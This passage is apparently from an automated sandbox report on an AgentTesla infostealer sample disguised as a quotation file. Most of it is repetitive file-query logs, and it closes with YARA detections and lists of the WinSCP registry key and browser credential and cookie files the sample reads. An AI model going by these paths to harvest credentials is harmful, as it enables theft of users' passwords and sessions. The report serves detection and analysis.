                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Users\user\Desktop\rQuotation3200025006.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeQueries volume information: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeQueries volume information: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.rQuotation3200025006.exe.377e4e0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.rQuotation3200025006.exe.3741cc0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.rQuotation3200025006.exe.377e4e0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001C.00000002.4163218058.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.4163218058.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.4164492788.000000000354A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4163306810.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.1961223046.0000000003241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.1958682977.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.4164492788.0000000003501000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.1961223046.000000000326C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4163306810.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1732806803.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: rQuotation3200025006.exe PID: 6744, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rQuotation3200025006.exe PID: 2756, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: pBBqGOzrz.exe PID: 7616, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 8012, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 7188, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Tries to harvest and steal ftp login credentials
